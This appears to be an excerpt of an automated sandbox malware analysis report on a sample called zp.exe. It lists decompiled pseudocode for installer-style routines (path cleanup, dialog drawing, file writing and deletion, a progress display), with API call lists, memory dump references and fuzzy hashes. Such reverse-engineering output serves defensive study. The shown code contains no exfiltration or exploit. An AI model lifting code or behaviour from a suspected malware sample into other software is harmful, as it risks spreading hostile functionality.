                                                            • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002466
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 1000247B
                                                            • GlobalFree.KERNEL32(00000000), ref: 10002482
                                                              • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                            • GlobalFree.KERNEL32(?), ref: 100024F0
                                                            • GlobalFree.KERNEL32(00000000), ref: 10002519
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5831148892.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.5831123478.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831177085.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831203248.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_zp.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 2278267121-0
                                                            • Opcode ID: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
                                                            • Instruction ID: 4c31113825cd6d876adfd950bde12b9626868b5f7bcca2444e77b9607fd07d19
                                                            • Opcode Fuzzy Hash: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
                                                            • Instruction Fuzzy Hash: 7A41AEB150825AEFFB11DFA4CDC8E2B7BECFB442C1B124529FA0182168DB31AD40DB25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405F49(CHAR* _a4) {
                                                            				char _t5;
                                                            				char _t7;
                                                            				char* _t15;
                                                            				char* _t16;
                                                            				CHAR* _t17;
                                                            
                                                            				_t17 = _a4;
                                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                            					_t17 =  &(_t17[4]);
                                                            				}
                                                            				if( *_t17 != 0 && E004057DB(_t17) != 0) {
                                                            					_t17 =  &(_t17[2]);
                                                            				}
                                                            				_t5 =  *_t17;
                                                            				_t15 = _t17;
                                                            				_t16 = _t17;
                                                            				if(_t5 != 0) {
                                                            					do {
                                                            						if(_t5 > 0x1f &&  *((char*)(E00405799("*?|<>/\":", _t5))) == 0) {
                                                            							E0040592A(_t16, _t17, CharNextA(_t17) - _t17);
                                                            							_t16 = CharNextA(_t16);
                                                            						}
                                                            						_t17 = CharNextA(_t17);
                                                            						_t5 =  *_t17;
                                                            					} while (_t5 != 0);
                                                            				}
                                                            				 *_t16 =  *_t16 & 0x00000000;
                                                            				while(1) {
                                                            					_t16 = CharPrevA(_t15, _t16);
                                                            					_t7 =  *_t16;
                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                            						break;
                                                            					}
                                                            					 *_t16 =  *_t16 & 0x00000000;
                                                            					if(_t15 < _t16) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				return _t7;
                                                            			}








                                                            0x00405f4b
                                                            0x00405f53
                                                            0x00405f67
                                                            0x00405f67
                                                            0x00405f6d
                                                            0x00405f7a
                                                            0x00405f7a
                                                            0x00405f7b
                                                            0x00405f7d
                                                            0x00405f81
                                                            0x00405f83
                                                            0x00405f8c
                                                            0x00405f8e
                                                            0x00405fa8
                                                            0x00405fb0
                                                            0x00405fb0
                                                            0x00405fb5
                                                            0x00405fb7
                                                            0x00405fb9
                                                            0x00405fbd
                                                            0x00405fbe
                                                            0x00405fc1
                                                            0x00405fc9
                                                            0x00405fcb
                                                            0x00405fcf
                                                            0x00000000
                                                            0x00000000
                                                            0x00405fd5
                                                            0x00405fda
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405fda
                                                            0x00405fdf

                                                            APIs
                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\zp.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FA1
                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\zp.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FB3
                                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\zp.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-945288684
                                                            • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                            • Instruction ID: 52ce86beafc523711f1768644b20335aaf79eeea50abe94daadfaeac939761d3
                                                            • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                            • Instruction Fuzzy Hash: C811C851808B97A9F73206340C44B77BF99CB5B760F18047BE9C4722C2D67C5C42DA6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404033(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				long _t35;
                                                            				long _t37;
                                                            				void* _t40;
                                                            				long* _t49;
                                                            
                                                            				if(_a4 + 0xfffffecd > 5) {
                                                            					L15:
                                                            					return 0;
                                                            				}
                                                            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                            				if(_t49 == 0) {
                                                            					goto L15;
                                                            				}
                                                            				_t35 =  *_t49;
                                                            				if((_t49[5] & 0x00000002) != 0) {
                                                            					_t35 = GetSysColor(_t35);
                                                            				}
                                                            				if((_t49[5] & 0x00000001) != 0) {
                                                            					SetTextColor(_a8, _t35);
                                                            				}
                                                            				SetBkMode(_a8, _t49[4]);
                                                            				_t37 = _t49[1];
                                                            				_v16.lbColor = _t37;
                                                            				if((_t49[5] & 0x00000008) != 0) {
                                                            					_t37 = GetSysColor(_t37);
                                                            					_v16.lbColor = _t37;
                                                            				}
                                                            				if((_t49[5] & 0x00000004) != 0) {
                                                            					SetBkColor(_a8, _t37);
                                                            				}
                                                            				if((_t49[5] & 0x00000010) != 0) {
                                                            					_v16.lbStyle = _t49[2];
                                                            					_t40 = _t49[3];
                                                            					if(_t40 != 0) {
                                                            						DeleteObject(_t40);
                                                            					}
                                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                                            				}
                                                            				return _t49[3];
                                                            			}








                                                            0x00404045
                                                            0x004040d9
                                                            0x00000000
                                                            0x004040d9
                                                            0x00404056
                                                            0x0040405a
                                                            0x00000000
                                                            0x00000000
                                                            0x00404060
                                                            0x00404069
                                                            0x0040406c
                                                            0x0040406c
                                                            0x00404072
                                                            0x00404078
                                                            0x00404078
                                                            0x00404084
                                                            0x0040408a
                                                            0x00404091
                                                            0x00404094
                                                            0x00404097
                                                            0x00404099
                                                            0x00404099
                                                            0x004040a1
                                                            0x004040a7
                                                            0x004040a7
                                                            0x004040b1
                                                            0x004040b6
                                                            0x004040b9
                                                            0x004040be
                                                            0x004040c1
                                                            0x004040c1
                                                            0x004040d1
                                                            0x004040d1
                                                            0x00000000

                                                            APIs
                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00404050
                                                            • GetSysColor.USER32(00000000), ref: 0040406C
                                                            • SetTextColor.GDI32(?,00000000), ref: 00404078
                                                            • SetBkMode.GDI32(?,?), ref: 00404084
                                                            • GetSysColor.USER32(?), ref: 00404097
                                                            • SetBkColor.GDI32(?,?), ref: 004040A7
                                                            • DeleteObject.GDI32(?), ref: 004040C1
                                                            • CreateBrushIndirect.GDI32(?), ref: 004040CB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                            • Instruction ID: 9508cbdce8052bc2bd730cf0eefd2a198c0b18875b65dcd903ac07b372545bec
                                                            • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                            • Instruction Fuzzy Hash: 482184B19047449BCB319F78DD08B5BBBF8AF41714F048A29EA96F22E1C738E944CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E10002218(void* __edx, intOrPtr _a4) {
                                                            				signed int _v4;
                                                            				CHAR* _t32;
                                                            				intOrPtr _t33;
                                                            				void* _t34;
                                                            				void* _t36;
                                                            				void* _t43;
                                                            				void** _t49;
                                                            				CHAR* _t58;
                                                            				void* _t59;
                                                            				signed int* _t60;
                                                            				void* _t61;
                                                            				intOrPtr* _t62;
                                                            				CHAR* _t63;
                                                            				void* _t73;
                                                            
                                                            				_t59 = __edx;
                                                            				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                            				while(1) {
                                                            					_t9 = _a4 + 0x818; // 0x818
                                                            					_t62 = (_v4 << 5) + _t9;
                                                            					_t32 =  *(_t62 + 0x14);
                                                            					if(_t32 == 0) {
                                                            						goto L9;
                                                            					}
                                                            					_t58 = 0x1a;
                                                            					if(_t32 == _t58) {
                                                            						goto L9;
                                                            					}
                                                            					if(_t32 != 0xffffffff) {
                                                            						if(_t32 <= 0 || _t32 > 0x19) {
                                                            							 *(_t62 + 0x14) = _t58;
                                                            						} else {
                                                            							_t32 = E100012BF(_t32 - 1);
                                                            							L10:
                                                            						}
                                                            						goto L11;
                                                            					} else {
                                                            						_t32 = E1000123B();
                                                            						L11:
                                                            						_t63 = _t32;
                                                            						_t13 = _t62 + 8; // 0x820
                                                            						_t60 = _t13;
                                                            						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
                                                            							_t49 = _t60;
                                                            						} else {
                                                            							_t49 =  *_t60;
                                                            						}
                                                            						_t33 =  *_t62;
                                                            						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
                                                            						if(_t33 == 0) {
                                                            							 *_t60 =  *_t60 & 0x00000000;
                                                            						} else {
                                                            							if(_t33 == 1) {
                                                            								_t36 = E1000131B(_t63);
                                                            								L27:
                                                            								 *_t49 = _t36;
                                                            								L31:
                                                            								_t34 = GlobalFree(_t63);
                                                            								if(_v4 == 0) {
                                                            									return _t34;
                                                            								}
                                                            								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                            									_v4 = _v4 + 1;
                                                            								} else {
                                                            									_v4 = _v4 & 0x00000000;
                                                            								}
                                                            								continue;
                                                            							}
                                                            							if(_t33 == 2) {
                                                            								 *_t49 = E1000131B(_t63);
                                                            								_t49[1] = _t59;
                                                            								goto L31;
                                                            							}
                                                            							_t73 = _t33 - 3;
                                                            							if(_t73 == 0) {
                                                            								_t36 = E10001224(_t63);
                                                            								 *(_t62 + 0x1c) = _t36;
                                                            								goto L27;
                                                            							}
                                                            							if(_t73 > 0) {
                                                            								if(_t33 <= 5) {
                                                            									_t61 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
                                                            									MultiByteToWideChar(0, 0, _t63,  *0x1000405c, _t61,  *0x1000405c);
                                                            									if( *_t62 != 5) {
                                                            										 *(_t62 + 0x1c) = _t61;
                                                            										 *_t49 = _t61;
                                                            									} else {
                                                            										_t43 = GlobalAlloc(0x40, 0x10);
                                                            										 *(_t62 + 0x1c) = _t43;
                                                            										 *_t49 = _t43;
                                                            										__imp__CLSIDFromString(_t61, _t43);
                                                            										GlobalFree(_t61);
                                                            									}
                                                            								} else {
                                                            									if(_t33 == 6 && lstrlenA(_t63) > 0) {
                                                            										 *_t60 = E10002536(E1000131B(_t63));
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L31;
                                                            					}
                                                            					L9:
                                                            					_t32 = E10001224(0x10004034);
                                                            					goto L10;
                                                            				}
                                                            			}

















                                                            0x10002218
                                                            0x1000222c
                                                            0x10002230
                                                            0x1000223b
                                                            0x1000223b
                                                            0x10002242
                                                            0x10002247
                                                            0x00000000
                                                            0x00000000
                                                            0x1000224b
                                                            0x1000224e
                                                            0x00000000
                                                            0x00000000
                                                            0x10002253
                                                            0x1000225e
                                                            0x1000226e
                                                            0x10002265
                                                            0x10002267
                                                            0x1000227d
                                                            0x1000227d
                                                            0x00000000
                                                            0x10002255
                                                            0x10002255
                                                            0x1000227e
                                                            0x10002282
                                                            0x10002284
                                                            0x10002284
                                                            0x10002287
                                                            0x1000228d
                                                            0x10002289
                                                            0x10002289
                                                            0x10002289
                                                            0x1000228f
                                                            0x10002291
                                                            0x10002297
                                                            0x10002362
                                                            0x1000229d
                                                            0x100022a0
                                                            0x1000235b
                                                            0x10002347
                                                            0x10002348
                                                            0x10002365
                                                            0x10002366
                                                            0x10002371
                                                            0x1000239b
                                                            0x1000239b
                                                            0x10002381
                                                            0x1000238d
                                                            0x10002383
                                                            0x10002383
                                                            0x10002383
                                                            0x00000000
                                                            0x10002381
                                                            0x100022a9
                                                            0x10002353
                                                            0x10002355
                                                            0x00000000
                                                            0x10002355
                                                            0x100022af
                                                            0x100022b2
                                                            0x1000233f
                                                            0x10002344
                                                            0x00000000
                                                            0x10002344
                                                            0x100022b8
                                                            0x100022c1
                                                            0x100022fd
                                                            0x1000230c
                                                            0x10002315
                                                            0x10002337
                                                            0x1000233a
                                                            0x10002317
                                                            0x1000231b
                                                            0x10002322
                                                            0x10002326
                                                            0x10002328
                                                            0x1000232f
                                                            0x1000232f
                                                            0x100022c3
                                                            0x100022c6
                                                            0x100022e8
                                                            0x100022ea
                                                            0x100022c6
                                                            0x100022c1
                                                            0x100022b8
                                                            0x00000000
                                                            0x10002297
                                                            0x10002273
                                                            0x10002278
                                                            0x00000000
                                                            0x10002278

                                                            APIs
                                                            • lstrlenA.KERNEL32(?), ref: 100022CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
                                                            • GlobalFree.KERNEL32(00000000), ref: 1000232F
                                                            • GlobalFree.KERNEL32(00000000), ref: 10002366
                                                              • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5831148892.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.5831123478.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831177085.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831203248.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_zp.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                            • String ID:
                                                            • API String ID: 3955009414-0
                                                            • Opcode ID: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
                                                            • Instruction ID: 8b241ec9b16495ad6526e456ecf9fe23ef16db2f5f6b1e36baefbe8d682bcded
                                                            • Opcode Fuzzy Hash: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
                                                            • Instruction Fuzzy Hash: 2A417C71509301EFF760DF648888B6AB7ECFB443D1F218929F946D6199DB34AA40CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E00402683(struct _OVERLAPPED* __ebx) {
                                                            				void* _t27;
                                                            				long _t32;
                                                            				struct _OVERLAPPED* _t47;
                                                            				void* _t51;
                                                            				void* _t53;
                                                            				void* _t56;
                                                            				void* _t57;
                                                            				void* _t58;
                                                            
                                                            				_t47 = __ebx;
                                                            				 *(_t58 - 8) = 0xfffffd66;
                                                            				_t52 = E004029FD(0xfffffff0);
                                                            				 *(_t58 - 0x44) = _t24;
                                                            				if(E004057DB(_t52) == 0) {
                                                            					E004029FD(0xffffffed);
                                                            				}
                                                            				E0040594A(_t52);
                                                            				_t27 = E0040596F(_t52, 0x40000000, 2);
                                                            				 *(_t58 + 8) = _t27;
                                                            				if(_t27 != 0xffffffff) {
                                                            					_t32 =  *0x4236f4;
                                                            					 *(_t58 - 0x2c) = _t32;
                                                            					_t51 = GlobalAlloc(0x40, _t32);
                                                            					if(_t51 != _t47) {
                                                            						E004031CC(_t47);
                                                            						E004031B6(_t51,  *(_t58 - 0x2c));
                                                            						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                            						 *(_t58 - 0x30) = _t56;
                                                            						if(_t56 != _t47) {
                                                            							E00402F1F(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                            							while( *_t56 != _t47) {
                                                            								_t49 =  *_t56;
                                                            								_t57 = _t56 + 8;
                                                            								 *(_t58 - 0x38) =  *_t56;
                                                            								E0040592A( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                            								_t56 = _t57 +  *(_t58 - 0x38);
                                                            							}
                                                            							GlobalFree( *(_t58 - 0x30));
                                                            						}
                                                            						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                            						GlobalFree(_t51);
                                                            						 *(_t58 - 8) = E00402F1F(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                            					}
                                                            					CloseHandle( *(_t58 + 8));
                                                            				}
                                                            				_t53 = 0xfffffff3;
                                                            				if( *(_t58 - 8) < _t47) {
                                                            					_t53 = 0xffffffef;
                                                            					DeleteFileA( *(_t58 - 0x44));
                                                            					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                            				}
                                                            				_push(_t53);
                                                            				E00401423();
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t58 - 4));
                                                            				return 0;
                                                            			}











                                                            0x00402683
                                                            0x00402685
                                                            0x00402691
                                                            0x00402694
                                                            0x0040269e
                                                            0x004026a2
                                                            0x004026a2
                                                            0x004026a8
                                                            0x004026b5
                                                            0x004026bd
                                                            0x004026c0
                                                            0x004026c6
                                                            0x004026d4
                                                            0x004026d9
                                                            0x004026dd
                                                            0x004026e0
                                                            0x004026e9
                                                            0x004026f5
                                                            0x004026f9
                                                            0x004026fc
                                                            0x00402706
                                                            0x00402725
                                                            0x0040270d
                                                            0x00402712
                                                            0x0040271a
                                                            0x0040271d
                                                            0x00402722
                                                            0x00402722
                                                            0x0040272c
                                                            0x0040272c
                                                            0x0040273e
                                                            0x00402745
                                                            0x00402757
                                                            0x00402757
                                                            0x0040275d
                                                            0x0040275d
                                                            0x00402768
                                                            0x00402769
                                                            0x0040276d
                                                            0x00402771
                                                            0x00402777
                                                            0x00402777
                                                            0x0040277e
                                                            0x0040217c
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                            • GlobalFree.KERNEL32(?), ref: 0040272C
                                                            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                            • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                            • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                            • String ID:
                                                            • API String ID: 3294113728-0
                                                            • Opcode ID: 82a50f43b36e1856efc9a971e964058a02736900cd8a254f9467012cb7b255d0
                                                            • Instruction ID: 503fd3c95f490675627f5e02168e5e633d1b488668870af047a7021cc1d79fd2
                                                            • Opcode Fuzzy Hash: 82a50f43b36e1856efc9a971e964058a02736900cd8a254f9467012cb7b255d0
                                                            • Instruction Fuzzy Hash: BF318B71C00128BBCF216FA5CD89DAE7E79EF09364F10423AF524772E1C6795D419BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402BDA(intOrPtr _a4) {
                                                            				char _v68;
                                                            				long _t6;
                                                            				struct HWND__* _t7;
                                                            				struct HWND__* _t15;
                                                            
                                                            				if(_a4 != 0) {
                                                            					_t15 =  *0x416894; // 0x0
                                                            					if(_t15 != 0) {
                                                            						_t15 = DestroyWindow(_t15);
                                                            					}
                                                            					 *0x416894 = 0;
                                                            					return _t15;
                                                            				}
                                                            				__eflags =  *0x416894; // 0x0
                                                            				if(__eflags != 0) {
                                                            					return E00406042(0);
                                                            				}
                                                            				_t6 = GetTickCount();
                                                            				__eflags = _t6 -  *0x4236ec;
                                                            				if(_t6 >  *0x4236ec) {
                                                            					__eflags =  *0x4236e8;
                                                            					if( *0x4236e8 == 0) {
                                                            						_t7 = CreateDialogParamA( *0x4236e0, 0x6f, 0, E00402B42, 0);
                                                            						 *0x416894 = _t7;
                                                            						return ShowWindow(_t7, 5);
                                                            					}
                                                            					__eflags =  *0x423794 & 0x00000001;
                                                            					if(( *0x423794 & 0x00000001) != 0) {
                                                            						wsprintfA( &_v68, "... %d%%", E00402BBE());
                                                            						return E00404FC9(0,  &_v68);
                                                            					}
                                                            				}
                                                            				return _t6;
                                                            			}







                                                            0x00402be6
                                                            0x00402be8
                                                            0x00402bef
                                                            0x00402bf2
                                                            0x00402bf2
                                                            0x00402bf8
                                                            0x00000000
                                                            0x00402bf8
                                                            0x00402c00
                                                            0x00402c06
                                                            0x00000000
                                                            0x00402c09
                                                            0x00402c10
                                                            0x00402c16
                                                            0x00402c1c
                                                            0x00402c1e
                                                            0x00402c24
                                                            0x00402c62
                                                            0x00402c6b
                                                            0x00000000
                                                            0x00402c70
                                                            0x00402c26
                                                            0x00402c2d
                                                            0x00402c3e
                                                            0x00000000
                                                            0x00402c4c
                                                            0x00402c2d
                                                            0x00402c78

                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                                            • GetTickCount.KERNEL32 ref: 00402C10
                                                            • wsprintfA.USER32 ref: 00402C3E
                                                              • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                              • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                              • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000), ref: 00405025
                                                              • Part of subcall function 00404FC9: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll), ref: 00405037
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                              • Part of subcall function 00402BBE: MulDiv.KERNEL32(00023753,00000064,0001BE16), ref: 00402BD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 722711167-2449383134
                                                            • Opcode ID: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
